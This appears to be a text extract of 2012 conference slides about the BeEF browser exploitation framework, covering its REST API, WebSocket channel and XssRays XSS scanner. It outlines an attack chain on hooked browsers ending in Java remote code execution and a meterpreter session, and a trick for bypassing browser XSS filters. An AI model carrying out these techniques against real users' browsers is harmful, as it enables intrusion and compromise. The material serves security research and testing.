  • 9. The need to be RESTful - programmatically control BeEF with whatever eats HTTP and JSON (bash + curl?) - facilitate integration with third tools (ZAP?) - create your own custom UI/GUI (mobile?) Saturday, May 5, 12
  • 10. The need to be RESTful More info: - http://blog.beefproject.com/2012/03/restful-api-from- antisnatchor-with-love.html - http://blog.beefproject.com/2012/03/restful-api-demo.html Read the doc, you lazy! - https://github.com/beefproject/beef/wiki/BeEF-RESTful-API Saturday, May 5, 12
  • 11. The need to be RESTful Demo time Pwn hooked browsers with JDK <= 1.6.0_27 1. get hooked browsers type/version/OS/plugins II. if browserIsIE createOverlayIframe(Above) else launchManInTheBrowser end III. if javaEnabled launchGetSystemInfo IV. if JDK <= 1.6.0_27 launchRhinoRCE V. enjoy Java meterpreter Saturday, May 5, 12
  • 12. The need to be speedy: WS BeEF communication channel uses XHR-polling Pros: - works everywhere (we support IE, Chrome, Safari, Firefox, Opera and mobile browsers) Cons: - not efficient, data overhead Saturday, May 5, 12
  • 13. The need to be speedy: WS Meet WebSocket support in BeEF XHR-polling Saturday, May 5, 12
  • 14. The need to be speedy: WS Meet WebSocket support in BeEF XHR-polling WebSockets Saturday, May 5, 12
  • 15. The need to be speedy: WS If beef.browser.hasWebSocket() don’t use XHR-polling, open a WebSocket channel currently supported: Firefox, Chrome, Safari also MozWebSocket (damn prefixes #$*(%$) speaks hixie-75, hixie-76, hybi-07, hybi-10 Saturday, May 5, 12
  • 16. The need to be speedy: WS still experimental in BeEF (bugfixing/testing phase) clone https://github.com/radoen/beef-radoen to give it a try opens a whole new range of possible features - real time VNC-like hooked browser control - faster Tunneling proxy (fuzzing through the hooked browser 4/5 times faster) - general faster communication Saturday, May 5, 12
  • 17. The need to be speedy: WS demo time - launch 1000 return_long_string modules, both normal XHR-polling and WebSockets Saturday, May 5, 12
  • 18. I want more XSSs: XssRays Originally developed by Gareth Heyes in 2009 as a pure JS- based XSS scanner. Then integrated in BeEF. XssRays basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path creating hidden iFrames. Who uses FrameBusting/X-Frame-Options out there :-)? Saturday, May 5, 12
  • 19. I want more XSSs: XssRays We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). Also means false-positive free. Potential false-negatives as we blindly inject vectors. Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource. Saturday, May 5, 12
  • 20. I want more XSSs: XssRays Saturday, May 5, 12
  • 21. I want more XSSs: XssRays It also works cross-domain (respecting the SOP) Saturday, May 5, 12
  • 22. I want more XSSs: XssRays Enhancements from previous months: - added more attack vectors double URL encoded, double nibble, DOM based injections - added Chrome/Safari support base64‘ing the iFrame src in order to bypass the XSS filter - added IE6 to IE9 support did you know that in IE6 location.pathname doesn’t contains the first forward slash? (thanks Gareth) Saturday, May 5, 12
  • 23. Thanks Thanks to my BeEFfy friends: Wade, Christian, Brendan, Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may have forgotten Our new blogger Heather P. SpiderLabs because I don’t have to take holidays to be here Special thanks to Kyprianos and Chris Saturday, May 5, 12
  • 24. Thanks follow us: @beefproject main site: http://beefproject.com the new blog: http://blog.beefproject.com github page: https://github.com/beefproject/beef (Please note: we’ll not pay you. You know we love OpenSource :-) Saturday, May 5, 12